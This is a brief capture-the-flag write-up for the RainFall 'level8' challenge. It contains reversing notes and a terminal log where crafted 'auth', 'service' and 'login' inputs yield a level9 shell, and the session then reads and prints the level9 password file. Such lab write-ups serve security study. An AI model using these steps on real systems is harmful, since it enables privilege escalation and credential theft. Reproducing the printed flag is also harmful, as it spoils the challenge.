# By checking the level8 program at the root of the repository we can see that he's waiting for entry in a loop
# By checking the code, we can found that it's waiting for some 'commands' in conditions by usiing memcmp and executing some things like malloc, strdup, free or fwrite and system
# 

level8@RainFall:~$ ./level8
(nil), (nil) 
auth 
0x804a008, (nil) 
auth 
0x804a018, (nil) 
service
0x804a018, 0x804a028 
service
0x804a018, 0x804a038 
login
$ whoami
level9
$ cat /home/user/level9/.pass
c542e581c5ba5162a85f767996e3247ed619ef6c6f7b76a59435545dc6259f8a